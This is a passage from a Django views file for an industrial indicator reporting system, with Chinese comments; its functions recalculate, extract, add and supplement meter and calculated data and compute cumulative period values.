\"D\":\n condtions = {'datadate': date}\n if cond == \"M\":\n condtions = {'datadate__year': date.year, 'datadate__month': date.month}\n if cond == \"Y\":\n condtions = {'datadate__year': date.year}\n if cond == \"L\":\n newdate = date + datetime.timedelta(days=-1)\n condtions = {'datadate': newdate}\n if cond == \"N\":\n newdate = date + datetime.timedelta(days=1)\n condtions = {'datadate': newdate}\n if cond == \"MS\":\n newdate = date.replace(day=1)\n condtions = {'datadate': newdate}\n if cond == \"ME\":\n year = date.year\n month = date.month\n a, b = calendar.monthrange(year, month)\n newdate = datetime.datetime(year=year, month=month, day=b)\n condtions = {'datadate': newdate}\n # 上月末,当月为1月,则数据为0\n if cond == \"LME\":\n date_now = date.replace(day=1)\n newdate = date_now + datetime.timedelta(days=-1)\n condtions = {'datadate': newdate}\n # 上月末,当月为1月,则取去年12月份数据\n if cond == \"ELME\":\n date_now = date.replace(day=1)\n newdate = date_now + datetime.timedelta(days=-1)\n condtions = {'datadate': newdate}\n if cond == \"LMS\":\n date_now = date.replace(day=1)\n date_now = date_now + datetime.timedelta(days=-1)\n newdate = datetime.datetime(date_now.year, date_now.month, 1)\n condtions = {'datadate': newdate}\n\n if cond == \"YS\":\n newdate = date.replace(month=1, day=1)\n condtions = {'datadate': newdate}\n if cond == \"YE\":\n newdate = date.replace(month=12, day=31)\n condtions = {'datadate': newdate}\n if cond == \"LYS\":\n newdate = date.replace(month=1, day=1)\n newdate = newdate + datetime.timedelta(days=-1)\n newdate = datetime.datetime(newdate.year, 1, 1)\n condtions = {'datadate': newdate}\n if cond == \"LYE\":\n newdate = date.replace(month=1, day=1)\n newdate = newdate + datetime.timedelta(days=-1)\n condtions = {'datadate': newdate}\n\n if cond == \"SS\":\n month = (date.month - 1) - (date.month - 1) % 3 + 1\n newdate = datetime.datetime(date.year, month, 1)\n condtions = {'datadate': newdate}\n if cond == \"SE\":\n month = (date.month - 1) - (date.month - 1) % 3 + 1\n if month == 10:\n newdate = datetime.datetime(date.year + 1, 1, 1) + datetime.timedelta(\n days=-1)\n else:\n newdate = datetime.datetime(date.year, month + 3, 1) + datetime.timedelta(\n days=-1)\n condtions = {'datadate': newdate}\n if cond == \"LSS\":\n month = (date.month - 1) - (date.month - 1) % 3 + 1\n newdate = datetime.datetime(date.year, month, 1)\n newdate = newdate + datetime.timedelta(days=-1)\n newdate = datetime.datetime(newdate.year, newdate.month - 2, 1)\n condtions = {'datadate': newdate}\n if cond == \"LSE\":\n month = (date.month - 1) - (date.month - 1) % 3 + 1\n newdate = datetime.datetime(date.year, month, 1)\n newdate = newdate + datetime.timedelta(days=-1)\n condtions = {'datadate': newdate}\n\n if cond == \"HS\":\n month = (date.month - 1) - (date.month - 1) % 6 + 1\n newdate = datetime.datetime(date.year, month, 1)\n condtions = {'datadate': newdate}\n if cond == \"HE\":\n month = (date.month - 1) - (date.month - 1) % 6 + 1\n if month == 7:\n newdate = datetime.datetime(date.year + 1, 1, 1) + datetime.timedelta(\n days=-1)\n else:\n newdate = datetime.datetime(date.year, month + 6, 1) + datetime.timedelta(\n days=-1)\n condtions = {'datadate': newdate}\n if cond == \"LHS\":\n month = (date.month - 1) - (date.month - 1) % 6 + 1\n newdate = datetime.datetime(date.year, month, 1)\n newdate = newdate + datetime.timedelta(days=-1)\n newdate = datetime.datetime(newdate.year, newdate.month - 5, 1)\n condtions = {'datadate': newdate}\n if cond == \"LHE\":\n month = (date.month - 1) - (date.month - 1) % 6 + 1\n newdate = datetime.datetime(date.year, month, 1)\n newdate = newdate + datetime.timedelta(days=-1)\n condtions = {'datadate': newdate}\n if cond == \"SLME\":\n newdate = date.replace(day=1)\n newdate = newdate + datetime.timedelta(days=-1)\n condtions = {'datadate': newdate}\n\n new_date = \"\"\n if cond == \"MAVG\" or cond == \"MMAX\" or cond == \"MMIN\":\n ms_newdate = date.replace(day=1)\n me_newdate = date\n new_date = (ms_newdate, me_newdate)\n\n if cond == \"SAVG\" or cond == \"SMAX\" or cond == \"SMIN\":\n month = (date.month - 1) - (date.month - 1) % 3 + 1\n ss_newdate = datetime.datetime(date.year, month, 1)\n se_newdate = date\n new_date = (ss_newdate, se_newdate)\n\n if cond == \"HAVG\" or cond == \"HMAX\" or cond == \"HMIN\":\n month = (date.month - 1) - (date.month - 1) % 6 + 1\n hs_newdate = datetime.datetime(date.year, month, 1)\n he_newdate = date\n new_date = (hs_newdate, he_newdate)\n\n if cond == \"YAVG\" or cond == \"YMAX\" or cond == \"YMIN\":\n ys_newdate = date.replace(month=1, day=1)\n ye_newdate = date\n new_date = (ys_newdate, ye_newdate)\n\n query_res = []\n if condtions:\n newdate = condtions['datadate']\n query_res = queryset.filter(**condtions).filter(target=membertarget).exclude(\n state=\"9\").select_related(\"target\")\n if new_date:\n query_res = queryset.filter(datadate__range=new_date).filter(\n target=membertarget).exclude(state=\"9\")\n\n if len(query_res) <= 0:\n if cond == \"SLME\" and newdate.month == 12:\n value = \"0\"\n else:\n value = \"数据不存在\"\n else:\n value = \"0\"\n if col == 'd':\n if cond == \"MAVG\" or cond == \"SAVG\" or cond == \"HAVG\" or cond == \"YAVG\":\n value = str(round(query_res.aggregate(Avg('curvalue'))[\"curvalue__avg\"],\n query_res[0].target.digit))\n elif cond == \"MMAX\" or cond == \"SMAX\" or cond == \"HMAX\" or cond == \"YMAX\":\n value = str(round(query_res.aggregate(Max('curvalue'))[\"curvalue__max\"],\n query_res[0].target.digit))\n elif cond == \"MMIN\" or cond == \"SMIN\" or cond == \"HMIN\" or cond == \"YMIN\":\n value = str(round(query_res.aggregate(Min('curvalue'))[\"curvalue__min\"],\n query_res[0].target.digit))\n elif cond == \"SLME\" and newdate.month in [12, 3, 6, 9]:\n value = \"0\"\n elif cond == \"LME\" and newdate.month == 12:\n value = \"0\"\n else:\n value = str(round(query_res[0].curvalue, query_res[0].target.digit))\n if operationtype == \"17\":\n childid = str(query_res[0].id)\n if col == 'm':\n if cond == \"MAVG\" or cond == \"SAVG\" or cond == \"HAVG\" or cond == \"YAVG\":\n value = str(\n round(\n query_res.aggregate(Avg('cumulativemonth'))[\n 'cumulativemonth__avg'],\n query_res[0].target.digit))\n elif cond == \"MMAX\" or cond == \"SMAX\" or cond == \"HMAX\" or cond == \"YMAX\":\n value = str(round(\n query_res.aggregate(Max('cumulativemonth'))[\"cumulativemonth__max\"],\n query_res[0].target.digit))\n elif cond == \"MMIN\" or cond == \"SMIN\" or cond == \"HMIN\" or cond == \"YMIN\":\n value = str(round(\n query_res.aggregate(Min('cumulativemonth'))[\"cumulativemonth__min\"],\n query_res[0].target.digit))\n elif cond == \"SLME\" and newdate.month in [12, 3, 6, 9]:\n value = \"0\"\n elif cond == \"LME\" and newdate.month == 12:\n value = \"0\"\n else:\n value = str(\n round(query_res[0].cumulativemonth, query_res[0].target.digit))\n if col == 's':\n if cond == \"MAVG\" or cond == \"SAVG\" or cond == \"HAVG\" or cond == \"YAVG\":\n value = str(\n round(\n query_res.aggregate(Avg('cumulativequarter'))[\n 'cumulativequarter__avg'],\n query_res[0].target.digit))\n elif cond == \"MMAX\" or cond == \"SMAX\" or cond == \"HMAX\" or cond == \"YMAX\":\n value = str(round(\n query_res.aggregate(Max('cumulativequarter'))[\n \"cumulativequarter__max\"],\n query_res[0].target.digit))\n elif cond == \"MMIN\" or cond == \"SMIN\" or cond == \"HMIN\" or cond == \"YMIN\":\n value = str(round(\n query_res.aggregate(Min('cumulativequarter'))[\n \"cumulativequarter__min\"],\n query_res[0].target.digit))\n elif cond == \"SLME\" and newdate.month in [12, 3, 6, 9]:\n value = \"0\"\n elif cond == \"LME\" and newdate.month == 12:\n value = \"0\"\n else:\n value = str(\n round(query_res[0].cumulativequarter, query_res[0].target.digit))\n if col == 'h':\n if cond == \"MAVG\" or cond == \"SAVG\" or cond == \"HAVG\" or cond == \"YAVG\":\n value = str(\n round(query_res.aggregate(Avg('cumulativehalfyear'))[\n 'cumulativehalfyear__avg'],\n query_res[0].target.digit))\n elif cond == \"MMAX\" or cond == \"SMAX\" or cond == \"HMAX\" or cond == \"YMAX\":\n value = str(round(query_res.aggregate(Max('cumulativehalfyear'))[\n \"cumulativehalfyear__max\"],\n query_res[0].target.digit))\n elif cond == \"MMIN\" or cond == \"SMIN\" or cond == \"HMIN\" or cond == \"YMIN\":\n value = str(round(query_res.aggregate(Min('cumulativehalfyear'))[\n \"cumulativehalfyear__min\"],\n query_res[0].target.digit))\n elif cond == \"SLME\" and newdate.month in [12, 3, 6, 9]:\n value = \"0\"\n elif cond == \"LME\" and newdate.month == 12:\n value = \"0\"\n else:\n value = str(\n round(query_res[0].cumulativehalfyear, query_res[0].target.digit))\n if col == 'y':\n if cond == \"MAVG\" or cond == \"SAVG\" or cond == \"HAVG\" or cond == \"YAVG\":\n value = str(\n round(query_res.aggregate(Avg('cumulativeyear'))[\n 'cumulativeyear__avg'],\n query_res[0].target.digit))\n elif cond == \"MMAX\" or cond == \"SMAX\" or cond == \"HMAX\" or cond == \"YMAX\":\n value = str(\n round(query_res.aggregate(Max('cumulativeyear'))[\n \"cumulativeyear__max\"],\n query_res[0].target.digit))\n elif cond == \"MMIN\" or cond == \"SMIN\" or cond == \"HMIN\" or cond == \"YMIN\":\n value = str(\n round(query_res.aggregate(Min('cumulativeyear'))[\n \"cumulativeyear__min\"],\n query_res[0].target.digit))\n elif cond == \"SLME\" and newdate.month in [12, 3, 6, 9]:\n value = \"0\"\n elif cond == \"LME\" and newdate.month == 12:\n value = \"0\"\n else:\n value = str(\n round(query_res[0].cumulativeyear, query_res[0].target.digit))\n\n target_chinese = '<' + target_name + ':' + target_col + ':' + target_cond + '>(' + value + ')'\n if childid:\n target_chinese = \"\"\n formula_chinese = formula_chinese.replace(target_english, target_chinese)\n\n formula_chinese = \"
\" + \\\n calculatedata[0].target.name + \"\" + formula_chinese + \"

\"\n # \"#1机组发电量\" + aa + \" + <发电量:当前值:当天>+1+#1机组发电量 123.2<#1_发电量:当前值:当天>+221.3<发电量:当前值:当天>+1=31.12

\")\n else:\n formula_chinese = \" 外部系统获得 = \" + str(round(calculatedata[0].curvalue, calculatedata[0].target.digit))\n formula_chinese = \"
\" + \\\n calculatedata[0].target.name + \"\" + formula_chinese + \"

\"\n return HttpResponse(formula_chinese)\n\n\ndef reporting_recalculate(request):\n if request.user.is_authenticated():\n app = request.POST.get('app', '')\n cycletype = request.POST.get('cycletype', '')\n reporting_date = request.POST.get('reporting_date', '')\n operationtype = request.POST.get('operationtype', '')\n funid = request.POST.get('funid', '')\n work = None\n status = 1\n data = '计算成功。'\n try:\n funid = int(funid)\n fun = Fun.objects.get(id=funid)\n work = fun.work\n except:\n pass\n\n try:\n app = int(app)\n reporting_date = getreporting_date(reporting_date, cycletype)\n except:\n return HttpResponse(0)\n\n guid = uuid.uuid1()\n cur_target = Target.objects.exclude(state=\"9\").filter(adminapp_id=app, cycletype=cycletype,\n operationtype=operationtype, work=work)\n\n # 所有常数\n all_constant = Constant.objects.exclude(state=\"9\").values()\n all_target = Target.objects.exclude(state=\"9\")\n tableyear = str(reporting_date.year)\n EntryTable = getmodels(\"Entrydata\", tableyear)\n MeterTable = getmodels(\"Meterdata\", tableyear)\n ExtractTable = getmodels(\"Extractdata\", tableyear)\n CalculateTable = getmodels(\"Calculatedata\", tableyear)\n tableList = {\"Entrydata\": EntryTable, \"Meterdata\": MeterTable, \"Extractdata\": ExtractTable,\n \"Calculatedata\": CalculateTable}\n\n for target in cur_target:\n if operationtype == \"17\":\n if target.calculateguid != str(guid):\n try:\n getcalculatedata(target, reporting_date, str(guid), all_constant, all_target, tableList)\n except Exception as e:\n print(e)\n status = 0\n data = '计算失败:{e}'.format(e=e)\n break\n\n return JsonResponse({\n 'status': status,\n 'data': data\n })\n\n\ndef reporting_reextract(request):\n if request.user.is_authenticated():\n app = request.POST.get('app', '')\n cycletype = request.POST.get('cycletype', '')\n reporting_date = request.POST.get('reporting_date', '')\n operationtype = request.POST.get('operationtype', '')\n funid = request.POST.get('funid', '')\n work = None\n try:\n funid = int(funid)\n fun = Fun.objects.get(id=funid)\n work = fun.work\n except:\n pass\n\n try:\n app = int(app)\n reporting_date = getreporting_date(reporting_date, cycletype)\n except:\n return HttpResponse(0)\n\n guid = uuid.uuid1()\n all_target = Target.objects.exclude(state=\"9\").filter(adminapp_id=app, cycletype=cycletype,\n operationtype=operationtype, work=work)\n tableyear = str(reporting_date.year)\n\n EntryTable = getmodels(\"Entrydata\", tableyear)\n MeterTable = getmodels(\"Meterdata\", tableyear)\n ExtractTable = getmodels(\"Extractdata\", tableyear)\n CalculateTable = getmodels(\"Calculatedata\", tableyear)\n tableList = {\"Entrydata\": EntryTable, \"Meterdata\": MeterTable, \"Extractdata\": ExtractTable,\n \"Calculatedata\": CalculateTable}\n\n for target in all_target:\n # 根据指标周期修改reporting_date\n a_cycle_aft_date = get_a_cycle_aft(reporting_date, cycletype)\n if operationtype == \"16\":\n extractdata = getmodels(\"Extractdata\", str(reporting_date.year)).objects.exclude(state=\"9\").filter(\n target_id=target.id).filter(datadate=reporting_date)\n if len(extractdata) > 0:\n extractdata = extractdata[0]\n # tablename = \"\"\n # try:\n # tablename = target.storage.tablename\n # except:\n # pass\n #\n # rows = []\n # if tablename:\n # try:\n # with connection.cursor() as cursor:\n # reporting_date_stf = reporting_date.strftime(\"%Y-%m-%d %H:%M:%S\")\n # strsql = \"SELECT curvalue FROM {tablename} WHERE target_id='{target_id}' AND datadate='{datadate}' ORDER BY id DESC\".format(\n # tablename=tablename, target_id=target.id, datadate=reporting_date_stf\n # )\n # cursor.execute(strsql)\n # rows = cursor.fetchall()\n # connection.close()\n # except Exception as e:\n # pass\n # if len(rows) > 0:\n # try:\n # if target.is_repeat == '2':\n # rownum = 0\n # rowvalue = 0\n # for row in rows:\n # if row[0] is not None:\n # rowvalue += row[0]\n # rownum += 1\n # extractdata.todayvalue = rowvalue / rownum\n # else:\n # extractdata.todayvalue = rows[0][0]\n # extractdata.todayvalue = decimal.Decimal(float(extractdata.todayvalue))\n # extractdata.todayvalue = round(extractdata.todayvalue, target.digit)\n # except:\n # pass\n # if not rows or not target.cycle: # 没取到数据 或者 没有取数周期,根据数据源实时取\n ret = Extract.getDataFromSource(target, a_cycle_aft_date)\n result_list = ret[\"result\"]\n if result_list:\n try:\n if target.is_repeat == '2':\n rownum = 0\n rowvalue = 0\n for row in result_list:\n if row[0] is not None:\n rowvalue += row[0]\n rownum += 1\n extractdata.todayvalue = rowvalue / rownum\n else:\n extractdata.todayvalue = result_list[0][0]\n extractdata.todayvalue = decimal.Decimal(extractdata.todayvalue)\n extractdata.todayvalue = round(extractdata.todayvalue, target.digit)\n except Exception as e:\n print(e)\n extractdata.curvalue = extractdata.todayvalue + extractdata.judgevalue\n if target.cumulative in ['1', '2', '3', '4', '5']:\n cumulative = getcumulative(tableList, target, reporting_date, extractdata.curvalue)\n extractdata.cumulativemonth = cumulative[\"cumulativemonth\"]\n extractdata.cumulativequarter = cumulative[\"cumulativequarter\"]\n extractdata.cumulativehalfyear = cumulative[\"cumulativehalfyear\"]\n extractdata.cumulativeyear = cumulative[\"cumulativeyear\"]\n extractdata.save()\n return HttpResponse(1)\n\n\ndef reporting_new(request):\n if request.user.is_authenticated():\n app = request.POST.get('app', '')\n cycletype = request.POST.get('cycletype', '')\n reporting_date = request.POST.get('reporting_date', '')\n operationtype = request.POST.get('operationtype', '')\n funid = request.POST.get('funid', '')\n work = None\n status = 1\n data = '新增成功。'\n\n try:\n funid = int(funid)\n fun = Fun.objects.get(id=funid)\n work = fun.work\n except:\n pass\n\n try:\n app = int(app)\n reporting_date = getreporting_date(reporting_date, cycletype)\n except:\n status = 0\n data = '应用不存在。'\n else:\n # 生成本次计算guid\n # 数据库中与本次guid不同的指标才参数计算\n guid = uuid.uuid1()\n cur_target = Target.objects.exclude(state=\"9\").filter(\n adminapp_id=app, cycletype=cycletype, operationtype=operationtype, work=work\n ).order_by(\"sort\")\n\n # 所有常数\n all_constant = Constant.objects.exclude(state=\"9\").values()\n all_target = Target.objects.exclude(state=\"9\")\n tableyear = str(reporting_date.year)\n\n EntryTable = getmodels(\"Entrydata\", tableyear)\n MeterTable = getmodels(\"Meterdata\", tableyear)\n ExtractTable = getmodels(\"Extractdata\", tableyear)\n CalculateTable = getmodels(\"Calculatedata\", tableyear)\n tableList = {\"Entrydata\": EntryTable, \"Meterdata\": MeterTable, \"Extractdata\": ExtractTable,\n \"Calculatedata\": CalculateTable}\n\n for target in cur_target:\n # 根据指标周期修改reporting_date\n a_cycle_aft_date = get_a_cycle_aft(reporting_date, cycletype)\n # 电表走字\n if operationtype == \"1\":\n\n all_meterdata = getmodels(\"Meterdata\", str((reporting_date + datetime.timedelta(\n days=-1)).year)).objects.exclude(state=\"9\").filter(target=target,\n datadate=reporting_date + datetime.timedelta(\n days=-1))\n meterdata = getmodels(\"Meterdata\", str(reporting_date.year))()\n if len(all_meterdata) > 0:\n meterdata.zerodata = all_meterdata[0].twentyfourdata if all_meterdata[0].twentyfourdata else 0\n else:\n meterdata.zerodata = 0\n meterdata.twentyfourdata = meterdata.zerodata\n\n tablename = \"\"\n try:\n tablename = target.storage.tablename\n except:\n pass\n # if tablename != \"\":\n rows = []\n if tablename:\n try:\n with connection.cursor() as cursor:\n reporting_date_stf = reporting_date.strftime(\"%Y-%m-%d %H:%M:%S\")\n strsql = \"SELECT curvalue FROM {tablename} WHERE target_id='{target_id}' AND datadate='{datadate}' ORDER BY id DESC\".format(\n tablename=tablename, target_id=target.id, datadate=reporting_date_stf\n )\n cursor.execute(strsql)\n rows = cursor.fetchall()\n finally:\n connection.close()\n\n if len(rows) > 0:\n try:\n meterdata.twentyfourdata = rows[0][0]\n except:\n pass\n if not rows or not target.cycle: # 没取到数据 或者 没有取数周期,根据数据源实时取\n ret = Extract.getDataFromSource(target, a_cycle_aft_date)\n result_list = ret[\"result\"]\n if result_list:\n try:\n meterdata.twentyfourdata = result_list[0][0]\n except:\n pass\n\n meterdata.target = target\n meterdata.datadate = reporting_date\n meterdata.metervalue = decimal.Decimal(meterdata.twentyfourdata) - decimal.Decimal(\n meterdata.zerodata)\n meterdata.todayvalue = decimal.Decimal(meterdata.metervalue) * decimal.Decimal(target.magnification)\n meterdata.todayvalue = round(meterdata.todayvalue, target.digit)\n meterdata.judgevalue = 0\n meterdata.releasestate = ''\n meterdata.curvalue = meterdata.todayvalue + meterdata.judgevalue\n\n if target.cumulative in ['1', '2', '3', '4', '5']:\n cumulative = getcumulative(tableList, target, reporting_date, meterdata.curvalue)\n meterdata.cumulativemonth = cumulative[\"cumulativemonth\"]\n meterdata.cumulativequarter = cumulative[\"cumulativequarter\"]\n meterdata.cumulativehalfyear = cumulative[\"cumulativehalfyear\"]\n meterdata.cumulativeyear = cumulative[\"cumulativeyear\"]\n meterdata.save()\n # 录入\n if operationtype == \"15\":\n entrydata = getmodels(\"Entrydata\", str(reporting_date.year))()\n entrydata.target = target\n entrydata.datadate = reporting_date\n entrydata.todayvalue = 0\n entrydata.judgevalue = 0\n entrydata.curvalue = 0\n entrydata.releasestate = ''\n if target.cumulative in ['1', '2', '3', '4', '5']:\n cumulative = getcumulative(tableList, target, reporting_date, entrydata.curvalue)\n entrydata.cumulativemonth = cumulative[\"cumulativemonth\"]\n entrydata.cumulativequarter = cumulative[\"cumulativequarter\"]\n entrydata.cumulativehalfyear = cumulative[\"cumulativehalfyear\"]\n entrydata.cumulativeyear = cumulative[\"cumulativeyear\"]\n entrydata.save()\n # 提取\n if operationtype == \"16\":\n extractdata = getmodels(\"Extractdata\", str(reporting_date.year))()\n extractdata.target = target\n extractdata.datadate = reporting_date\n extractdata.todayvalue = -9999\n extractdata.judgevalue = 0\n extractdata.releasestate = ''\n\n tablename = \"\"\n try:\n tablename = target.storage.tablename\n except:\n pass\n\n rows = []\n if tablename:\n try:\n cursor = connection.cursor()\n with connection.cursor() as cursor:\n reporting_date_stf = reporting_date.strftime(\"%Y-%m-%d %H:%M:%S\")\n strsql = \"SELECT curvalue FROM {tablename} WHERE target_id='{target_id}' AND datadate='{datadate}' ORDER BY id DESC\".format(\n tablename=tablename, target_id=target.id, datadate=reporting_date_stf\n )\n cursor.execute(strsql)\n rows = cursor.fetchall()\n connection.close()\n except Exception as e:\n pass\n if len(rows) > 0:\n try:\n if target.is_repeat == '2':\n rownum = 0\n rowvalue = 0\n for row in rows:\n if row[0] is not None:\n rowvalue += row[0]\n rownum += 1\n extractdata.todayvalue = rowvalue / rownum\n else:\n extractdata.todayvalue = rows[0][0]\n extractdata.todayvalue = decimal.Decimal(float(extractdata.todayvalue))\n extractdata.todayvalue = round(extractdata.todayvalue, target.digit)\n except:\n pass\n if not rows or not target.cycle: # 没取到数据 或者 没有取数周期,根据数据源实时取\n ret = Extract.getDataFromSource(target, a_cycle_aft_date)\n result_list = ret[\"result\"]\n if result_list:\n try:\n if target.is_repeat == '2':\n rownum = 0\n rowvalue = 0\n for row in result_list:\n if row[0] is not None:\n rowvalue += row[0]\n rownum += 1\n extractdata.todayvalue = rowvalue / rownum\n else:\n extractdata.todayvalue = result_list[0][0]\n extractdata.todayvalue = decimal.Decimal(float(extractdata.todayvalue))\n extractdata.todayvalue = round(extractdata.todayvalue, target.digit)\n except Exception as e:\n print(e)\n extractdata.curvalue = extractdata.todayvalue + extractdata.judgevalue\n if target.cumulative in ['1', '2', '3', '4', '5']:\n cumulative = getcumulative(tableList, target, reporting_date, extractdata.curvalue)\n extractdata.cumulativemonth = cumulative[\"cumulativemonth\"]\n extractdata.cumulativequarter = cumulative[\"cumulativequarter\"]\n extractdata.cumulativehalfyear = cumulative[\"cumulativehalfyear\"]\n extractdata.cumulativeyear = cumulative[\"cumulativeyear\"]\n extractdata.save()\n # 计算\n if operationtype == \"17\":\n # 为减少重复计算,判断指标calculate,如果指标calculate等于本次计算guid,则说明该指标在本次计算中以计算过\n if target.calculateguid != str(guid):\n try:\n getcalculatedata(target, reporting_date, str(guid), all_constant, all_target, tableList)\n except Exception as e:\n print(e)\n status = 0\n data = '计算失败:{e}'.format(e=e)\n import traceback\n traceback.print_exc()\n break\n\n return JsonResponse({\n 'status': status,\n 'data': data\n })\n\n\ndef reporting_supply(request):\n if request.user.is_authenticated():\n app = request.POST.get('app', '')\n savedata = request.POST.get('savedata')\n exist_target_id = json.loads(savedata)\n operationtype = request.POST.get('operationtype')\n cycletype = request.POST.get('cycletype', '')\n reporting_date = request.POST.get('reporting_date', '')\n funid = request.POST.get('funid', '')\n work = None\n status = 1\n data = '补充成功。'\n try:\n funid = int(funid)\n fun = Fun.objects.get(id=funid)\n work = fun.work\n except:\n pass\n try:\n app = int(app)\n reporting_date = getreporting_date(reporting_date, cycletype)\n except:\n pass\n # 所有常数\n all_constant = Constant.objects.exclude(state=\"9\").values()\n all_target = Target.objects.exclude(state=\"9\")\n tableyear = str(reporting_date.year)\n\n EntryTable = getmodels(\"Entrydata\", tableyear)\n MeterTable = getmodels(\"Meterdata\", tableyear)\n ExtractTable = getmodels(\"Extractdata\", tableyear)\n CalculateTable = getmodels(\"Calculatedata\", tableyear)\n tableList = {\"Entrydata\": EntryTable, \"Meterdata\": MeterTable, \"Extractdata\": ExtractTable,\n \"Calculatedata\": CalculateTable}\n guid = uuid.uuid1()\n cur_target = Target.objects.exclude(state=\"9\").order_by(\"sort\").filter(adminapp__id=app, operationtype=operationtype,\n cycletype=cycletype, work=work).exclude(id__in=exist_target_id)\n if len(cur_target) <= 0:\n status = 0\n data = '无需补充。'\n else:\n for target in cur_target:\n a_cycle_aft_date = get_a_cycle_aft(reporting_date, cycletype)\n if operationtype == \"1\":\n all_meterdata = getmodels(\"Meterdata\", str((reporting_date + datetime.timedelta(\n days=-1)).year)).objects.exclude(state=\"9\").filter(target=target,datadate=reporting_date + datetime.timedelta(days=-1))\n meterdata = getmodels(\"Meterdata\", str(reporting_date.year))()\n if len(all_meterdata) > 0:\n meterdata.zerodata = all_meterdata[0].twentyfourdata if all_meterdata[0].twentyfourdata else 0\n else:\n meterdata.zerodata = 0\n meterdata.twentyfourdata = meterdata.zerodata\n tablename = \"\"\n try:\n tablename = target.storage.tablename\n except:\n pass\n rows = []\n if tablename:\n try:\n with connection.cursor() as cursor:\n reporting_date_stf = reporting_date.strftime(\"%Y-%m-%d %H:%M:%S\")\n strsql = \"SELECT curvalue FROM {tablename} WHERE target_id='{target_id}' AND datadate='{datadate}' ORDER BY id DESC\".format(\n tablename=tablename, target_id=target.id, datadate=reporting_date_stf\n )\n cursor.execute(strsql)\n rows = cursor.fetchall()\n finally:\n connection.close()\n if len(rows) > 0:\n try:\n meterdata.twentyfourdata = rows[0][0]\n except:\n pass\n if not rows or not target.cycle:\n ret = Extract.getDataFromSource(target, a_cycle_aft_date)\n result_list = ret[\"result\"]\n if result_list:\n try:\n meterdata.twentyfourdata = result_list[0][0]\n except:\n pass\n meterdata.target = target\n meterdata.datadate = reporting_date\n meterdata.metervalue = decimal.Decimal(meterdata.twentyfourdata) - decimal.Decimal(\n meterdata.zerodata)\n meterdata.todayvalue = decimal.Decimal(meterdata.metervalue) * decimal.Decimal(target.magnification)\n meterdata.todayvalue = round(meterdata.todayvalue, target.digit)\n meterdata.judgevalue = 0\n meterdata.curvalue = meterdata.todayvalue + meterdata.judgevalue\n if target.cumulative in ['1', '2', '3', '4', '5']:\n cumulative = getcumulative(tableList, target, reporting_date, meterdata.curvalue)\n meterdata.cumulativemonth = cumulative[\"cumulativemonth\"]\n meterdata.cumulativequarter = cumulative[\"cumulativequarter\"]\n meterdata.cumulativehalfyear = cumulative[\"cumulativehalfyear\"]\n meterdata.cumulativeyear = cumulative[\"cumulativeyear\"]\n meterdata.save()\n if operationtype == \"15\":\n entrydata = getmodels(\"Entrydata\", str(reporting_date.year))()\n entrydata.target = target\n entrydata.datadate = reporting_date\n entrydata.todayvalue = 0\n entrydata.judgevalue = 0\n entrydata.curvalue = 0\n if target.cumulative in ['1', '2', '3', '4', '5']:\n cumulative = getcumulative(tableList, target, reporting_date, entrydata.curvalue)\n entrydata.cumulativemonth = cumulative[\"cumulativemonth\"]\n entrydata.cumulativequarter = cumulative[\"cumulativequarter\"]\n entrydata.cumulativehalfyear = cumulative[\"cumulativehalfyear\"]\n entrydata.cumulativeyear = cumulative[\"cumulativeyear\"]\n entrydata.save()\n if operationtype == \"16\":\n extractdata = getmodels(\"Extractdata\", str(reporting_date.year))()\n extractdata.target = target\n extractdata.datadate = reporting_date\n extractdata.todayvalue = -9999\n extractdata.judgevalue = 0\n\n tablename = \"\"\n try:\n tablename = target.storage.tablename\n except:\n pass\n rows = []\n if tablename:\n try:\n cursor = connection.cursor()\n with connection.cursor() as cursor:\n reporting_date_stf = reporting_date.strftime(\"%Y-%m-%d %H:%M:%S\")\n strsql = \"SELECT curvalue FROM {tablename} WHERE target_id='{target_id}' AND datadate='{datadate}' ORDER BY id DESC\".format(\n tablename=tablename, target_id=target.id, datadate=reporting_date_stf\n )\n cursor.execute(strsql)\n rows = cursor.fetchall()\n connection.close()\n except Exception as e:\n pass\n if len(rows) > 0:\n try:\n if target.is_repeat == '2':\n rownum = 0\n rowvalue = 0\n for row in rows:\n if row[0] is not None:\n rowvalue += row[0]\n rownum += 1\n extractdata.todayvalue = rowvalue / rownum\n else:\n extractdata.todayvalue = rows[0][0]\n extractdata.todayvalue = decimal.Decimal(\n float(extractdata.todayvalue) * float(target.magnification))\n extractdata.todayvalue = round(extractdata.todayvalue, target.digit)\n except:\n pass\n if not rows or not target.cycle:\n ret = Extract.getDataFromSource(target, a_cycle_aft_date)\n result_list = ret[\"result\"]\n if result_list:\n try:\n if target.is_repeat == '2':\n rownum = 0\n rowvalue = 0\n for row in result_list:\n if row[0] is not None:\n rowvalue += row[0]\n rownum += 1\n extractdata.todayvalue = rowvalue / rownum\n else:\n extractdata.todayvalue = result_list[0][0]\n extractdata.todayvalue = decimal.Decimal(\n float(extractdata.todayvalue) * float(target.magnification))\n extractdata.todayvalue = round(extractdata.todayvalue, target.digit)\n except Exception as e:\n print(e)\n extractdata.curvalue = extractdata.todayvalue + extractdata.judgevalue\n if target.cumulative in ['1', '2', '3', '4', '5']:\n cumulative = getcumulative(tableList, target, reporting_date, extractdata.curvalue)\n extractdata.cumulativemonth = cumulative[\"cumulativemonth\"]\n extractdata.cumulativequarter = cumulative[\"cumulativequarter\"]\n extractdata.cumulativehalfyear = cumulative[\"cumulativehalfyear\"]\n extractdata.cumulativeyear = cumulative[\"cumulativeyear\"]\n extractdata.save()\n if operationtype == \"17\":\n if target.calculateguid != str(guid):\n try:\n getcalculatedata(target, reporting_date, str(guid), all_constant, all_target, tableList)\n except Exception as e:\n print(e)\n status = 0\n data = '计算失败:{e}'.format(e=e)\n import traceback\n traceback.print_exc()\n break\n\n return JsonResponse({\n 'status': status,\n 'data': data\n })\n\n\ndef reporting_del(request):\n if request.user.is_authenticated():\n result = {\n 'status': 1,\n 'data': '删除成功。'\n }\n app = request.POST.get('app', '')\n cycletype = request.POST.get('cycletype', '')\n reporting_date = request.POST.get('reporting_date', '')\n operationtype = request.POST.get('operationtype', '')\n funid = request.POST.get('funid', '')\n work = None\n user_id = request.user.id\n try:\n funid = int(funid)\n fun = Fun.objects.get(id=funid)\n work = fun.work\n app = int(app)\n except:\n result['status'] = 0\n result['data'] = '网络异常。'\n else:\n try:\n reporting_date = getreporting_date(reporting_date, cycletype)\n except:\n result['status'] = 0\n result['data'] = '报表时间处理异常。'\n else:\n all_data = []\n if operationtype == \"1\":\n all_data = getmodels(\"Meterdata\", str(reporting_date.year)).objects.exclude(state=\"9\").filter(\n target__adminapp_id=app, target__cycletype=cycletype,\n target__work=work,\n datadate=reporting_date)\n if operationtype == \"15\":\n 